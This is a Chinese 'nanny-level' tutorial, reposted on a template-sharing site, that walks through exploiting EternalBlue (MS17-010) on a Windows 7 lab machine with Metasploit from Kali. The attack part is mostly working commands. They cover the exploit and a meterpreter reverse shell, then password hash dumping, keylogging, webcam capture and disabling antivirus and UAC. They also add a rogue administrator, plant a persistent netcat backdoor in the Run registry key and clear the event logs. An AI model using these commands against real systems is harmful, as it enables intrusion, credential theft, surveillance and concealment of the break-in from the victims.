永恒之蓝漏洞复现(ms17-010)----保姆级教程

这篇具有很好参考价值的文章主要介绍了永恒之蓝漏洞复现(ms17-010)----保姆级教程。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

攻击机: kali Linux             靶机: win7 x64   

提示:  复现攻击前请关闭杀毒软件

 文章来源地址https://www.toymoban.com/news/detail-404212.html

1.复现第一步按以下操作打开 445端口: 在 "运行" 里输入: regedit 打开注册表编辑器                                                                          2. 依次打开目录: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters

3. 在 Parameters 里有一个类型为 REG_DWORD 名字为 SmbDeviceEnabled 的的项                 

4. 右键点击修改,将它的16进制制改为1                       永恒之蓝漏洞复现(ms17-010)----保姆级教程                                                                      

 

 永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

2. 在靶机打开 ”控制面版----系统和安全----Windows Update(在它下面点击--查看已安装的更新),打开后有很多补丁程序,找到用来防止永恒之蓝的补丁并卸载它。我这里是 ( KB4012212 和 KB4499175) 。我已经卸载。                                                                                                              永恒之蓝漏洞复现(ms17-010)----保姆级教程                                                                         

 

 

3.  打开 “控制面版----系统和安全----Windows 防火墙----高级设置,在 "入站规则" 和 "出站规则" 分别启用以下规则。                                                                                                                                永恒之蓝漏洞复现(ms17-010)----保姆级教程

永恒之蓝漏洞复现(ms17-010)----保姆级教程 

 

 

 

4. 打开 ”网络和共享中心----更改高级共享设置,开启以下设置。                                                         永恒之蓝漏洞复现(ms17-010)----保姆级教程

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

5. 在 kali 输入: nmap -T4 -A -v 192.168.189.181  #靶机ip地址---进行ip端口扫描,图2显示靶机445端口被打开,存在永恒之蓝漏洞。                              永恒之蓝漏洞复现(ms17-010)----保姆级教程                                    

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

6. 打开 msfconsole 框架                                                                                                                     永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

7. 输入 search ms17-010  查看永恒之蓝漏洞利用模块                                                                       永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

8.  输入 use auxiliary/scanner/smb/smb_ms17_010   该模块用于扫描,嗅探,指纹识别等相关功能。                                                                                                                                                    永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

9. 输入  show options   查看模块需要的配置参数                                                                                   永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

10. 输入  set rhosts 192.168.189.181   设置攻击目标和目标和445端口号                                                                          永恒之蓝漏洞复现(ms17-010)----保姆级教程                                            

 

 

11. 再次输入  show options    查看配置参数                                                                                                永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

12. 输入  run  执行扫描 ,显示主机容易被攻击                                                                                  永恒之蓝漏洞复现(ms17-010)----保姆级教程                                                                                                                        

 

 

13. 输入  use exploit/windows/smb/ms17_010_eternalblue   启动ms17-010 攻击模块                        永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

14. 输入 info  查看这个漏洞信息                                                                                                                 永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

15. 输入  show targets    显示该攻击模块针对哪些操作系统、版本有用(可攻击的平台)。                                            永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

16.  输入  show payloads    查看攻击载荷                                                                                               永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

17. 输入  payload/windows/x64/meterpreter/reverse_tcp   设置攻击载荷                                          永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

19.  输入 set rhosts 192.168.189.181、set rport 445  设置攻击目标ip和端口号                                                                              永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

20. 输入 set lhost 192.168.189.188、set lport 4444  设置监听主机ip和端口号(kali)                                 

 永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

21. 输入 show options  查看配置好的攻击机和靶机参数                                                           

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

22. 输入  run   执行攻击,攻击成功显示下图。成功后可以进行文件上传、获取截屏、获取密码、打开摄像头拍照、远程桌面链接、后门持久化等操作。                                                                                       永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

 

23.  渗透成功后后续阶段: 运行run 成功后,开启了一个reverse TCP 监听器来监听本地的4444端口( 攻击者的本地主机地址 lhost 和端口号 lport)。                        

@在meterpreter> 中可以使用以下命令来实现对目标的操作:   

(1).  sysinfo      查看目标主机系统信息                (2).  run  scraper    查看目标主机详细信息              (3).  hashdump       导出密码的哈希                      (4).  load  kiwi         加载                                      (5).  ps                    查看目标主机进程信息          (6).  pwd          查看目标主机当前目录(windows)    (7).  getlwd        查看目标主机当前目录(linux)         (8).  search  -f  *.jsp  -d  e:\        搜所E盘中以.jsp为后缀的文件                                                         (9).  download  e:\test.txt    /root   将目标的e:\test.txt 文件下载到/root 目录下                          (10). upload /root/test.txt d:\test      将/root/test.txt 上传到目标机器的 d:\test 目录下                     

(11).  PIDmigrate  1384      将当前Meterpreter Shell的进程迁移到PID为1384的进程上                 (12).  idletime      查看主机运行时间                    (13).  getuid         查看获取到的当前权限         (14).  getsystem      提权                                        (15).  run  killav       关闭杀毒软件                         (16).  screenshot      截图                                       (17).  webcam_list     查看目标主机的摄像头          (18).  webcam_snap      拍照                                 (19).  webcam_stream      开视频                    (20).  execute  参数  -f  可执行文件   执行可执行程序                                                                    (21).  run  getgui  -u  hack  -p  123                    创建hack用户,密码为123                                      (22).  run  getgui  -e    开启远程桌面链接       (23).  keyscan_start      开启键盘记录功能      (24).  keyscan_dump   显示捕捉到的键盘记录信息(25).  keyscan_stop     停止键盘记录功能          (26).  uictl  disable  keyboard    禁止目标使用键盘(27).  uictl  enable  keyboard     允许目标使用键盘 (28).  uictl  disable  mouse        禁止目标使用鼠标 (29).  uictl  enable   mouse        允许目标使用鼠标 (30).  load                                   使用扩展库        (31).  run                                      执行攻击           (32).  clearev                                清除日志            

 

 

 

24.   示例: 输入 sysinfo  查看目标主机系统                                                                                       

      永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

25. 示例:输入 ipconfig  查看主机ip                         永恒之蓝漏洞复现(ms17-010)----保姆级教程                                                                         

 

 

 

26.  示例: 输入 getuid  查看用户身份(windows 系统权限)                                                                                                 永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

27.   示例: 输入 shell  获得shell控制台                    永恒之蓝漏洞复现(ms17-010)----保姆级教程                                                                        

 

 

 

28.  想要从目标主机shell 退出到 meterpreter,输入 exit  退出shell。      永恒之蓝漏洞复现(ms17-010)----保姆级教程                                           

 

 

 

29. 示例: 输入 screenshot  获取靶机截屏                                                                                          永恒之蓝漏洞复现(ms17-010)----保姆级教程   

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

30. 以下模块主要用于在获得目标主机系统远程控制权后,进行一系列后渗透攻击

(1).  run post/windows/manage/migrate      自动进程迁移                                                                (2).  run post/windows/gather/checkvm       查看靶机是否运行在虚拟机上                                        (3).  run post/windows/manage/killav          关闭杀毒软件                                                                 (4).  run post/windows/manage/enable_rdp        开启远程桌面服务                                                   (5).  run post/windows/manage/autoroute           查看路由信息                                                          (6). run post/windows/gather/enum_logged_on_users     列举当前登录的用户                                         (7).  run post/windows/gather/enum_applications       列举应用程序                                                       (8).  run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码                           (9).  run windows/gather/smart_hashdump        dump出所由用户的hash

 

 

 

31. 示例: 输入  hashdump 或 run windows/gather/smart_hashdump    获取用户密码                     永恒之蓝漏洞复现(ms17-010)----保姆级教程                  

 

 

32.  将得到的哈希码放到MD5在线破解上解密得到明文密码                                                                  永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

33.  输入  shell  进入shell控制台                   永恒之蓝漏洞复现(ms17-010)----保姆级教程                                                                                          

 

 

34.  输入   net user hackk 123456 add    在靶机上创建一个名为hackk的用户,密码为123456           永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

35. 输入  net  localgroup  administrators  hackk  /add    将hackk添加到Windows 7的本地管理员组中,以便获得更大的权限。                             

 永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

36. 输入  net  user    查看本地用户                                                                                                      永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

37. 输入  net  localgroup  administrators    查看本地管理员 ,可以看到hackk已被添加进管理员组中                                                                 永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

38. 输入  run getgui -e  或  run post/windows/manage/enable_rdp    开启靶机远程桌面链接            

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

39.  在kali 输入  rdesktop  192.168.189.188   靶机ip地址,就可打开远程桌面        永恒之蓝漏洞复现(ms17-010)----保姆级教程                     

 永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

40.  输入  hashdump  查看用户密码                     永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

41. 输入  netsh firewall add portopening TCP 4444 "hackk"  ENABLE ALL    创建防火墙规则         永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

42. 输入  netsh firewall add portopening TCP 443  "hackk"  ENABLE ALL    新建一条防火墙规则,允许443端口访问网络                                                                   

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

43. 输入    cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f                                          关闭UAC,以达到阻止未经用户授权的程序启动破坏系统                                                                  

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

44. 输入   cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f                                                                  开启默认共享,方便攻击者执行远程命令  

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

45. 在kali 输入  ls /usr/share/windows-binaries/nc.exe     查看nc反弹后门程序在kali里的路径                                     

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

46. 输入  upload /usr/share/windows-binaries/nc.exe  C:\\Windows                              上传nc到靶机C盘windows文件夹中,打开靶机可以看到从kali上传到win7的nc程序永恒之蓝漏洞复现(ms17-010)----保姆级教程     

永恒之蓝漏洞复现(ms17-010)----保姆级教程                                                                                                                                             

 

 

 

47. 输入  reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\Windows\nc.exe -Ldp 443 -e cmd.exe'                                           当靶机开机后,允许443端口访问网络。(用于连接nc的端口)                                                                                                                            

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

48. 输入  run  post/windows/manage/enable_rdp                    开启目标远程桌面链接 ,然后在kali输入 

rdesktop 192.168.189.188                                    (靶机ip) 链接远程桌面,并重启靶机                                           

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

49. 在kali 输入  nc -v 192.168.189.188 443       就可以通过nc连接靶机进入控制台

   永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

50.  向反弹到kali的靶机控制台输入   wevtutil cl security     清除登录日志                                                  

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

52.  向反弹到kali的靶机控制台输入   wevtutil cl system     清除系统日志               永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

53.  向反弹到kali的靶机控制台输入  wevtutil cl application  清除应用程序日志  

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 

 

55. 靶机日制被清空,渗透完成                                                                                                          

永恒之蓝漏洞复现(ms17-010)----保姆级教程

 

 永恒之蓝漏洞复现(ms17-010)----保姆级教程

永恒之蓝漏洞复现(ms17-010)----保姆级教程 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

到了这里,关于永恒之蓝漏洞复现(ms17-010)----保姆级教程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 环境 信息收集 先扫描目标靶机IP 进入MSF查看是否存在永恒之蓝的漏洞 攻击 攻击机:kali 靶机:Windows Server 2008 对ip进行收集开放什么端口 先扫描目标靶机IP 因为在同一个内网之中 所以可以使用arp-scan -l 进行查询 知道目标靶机IP(192.168.162.146)来进

    2024年03月25日
    浏览(45)
  • 永恒之蓝ms17_010漏洞复现

    攻击机:Linux kali(IP:192.168.52.132) 靶机:Windows 7(x64)(IP:192.168.52.130) 条件:靶机防火墙关闭,两台机子能够相互ping通,靶机445端口开启(永恒之蓝漏洞就是通过恶意代码扫描并攻击开放445端口的 Windows 主机)   登录 kali linux,用 nmap 探测本网段存活主机 nmap 192.168.5

    2024年02月11日
    浏览(28)
  • 【ms17-010】永恒之蓝漏洞复现

    准备工作 攻击机:kali,ip:192.168.56.128 靶机:windows server 2003,ip:192.168.56.132 工具:nmap(扫描)、msf 漏洞利用 首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况 此时已经扫描出来了,ip为: 192.168.56.132 的主机开启,并且显示了开放的端口号。 然后我们可以使用:

    2024年01月19日
    浏览(32)
  • ms17-010(永恒之蓝) 漏洞复现与处理

    ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入

    2024年02月09日
    浏览(33)
  • 《MS17-010(永恒之蓝)—漏洞复现及防范》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 - 永恒之蓝 永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。而SMB服务是一个协议名,它能被用于Web连接和客户端与服

    2024年02月06日
    浏览(80)
  • MS17-010(永恒之蓝)漏洞分析与复现

    一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广

    2024年02月02日
    浏览(30)
  • 利用kali Linux复现永恒之蓝(MS17-010)漏洞

    目录 什么是永恒之蓝? 永恒之蓝漏洞原理 实验环境 操作前提 实验步骤 (1)复现成功后,执行截图命令 (2)对受害机器建立用户,并且开启受害机器的远程桌面并连接 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒

    2024年02月12日
    浏览(27)
  • 复现永恒之蓝[MS17_010]

    目录 准备靶机 测试ping连通性 攻击漏洞 利用漏洞 1台kali,1台win7 win7系统可以在MSDN镜像网站里获取 注:将win7安装好,win7无法安装vmtools,若升级系统,可能会把永恒之蓝补丁打上,所以建议别升级系统     win7的IP地址为192.168.164.129  kali的IP地址为192.168.164.130 将这两台机器互

    2024年02月01日
    浏览(24)
  • 永恒之蓝(ms17-010)简介与复现

    永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲

    2024年02月10日
    浏览(41)
  • MS17-010 永恒之蓝漏洞利用方式

    Eternal blue永恒之蓝漏洞 windows操作系统漏洞 借助工具Metasploit复现漏洞 利用条件: 1.目标计算机开启445端口 2.一般适用计算机系统 windows7 或windows server2008 R2 攻击机器:kali-Linux  192.168.109.130 目标靶机:windows7  192.168.109.129 1.在黑客机器中对目标计算机进行端口的扫描  发现目

    2024年02月09日
    浏览(32)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包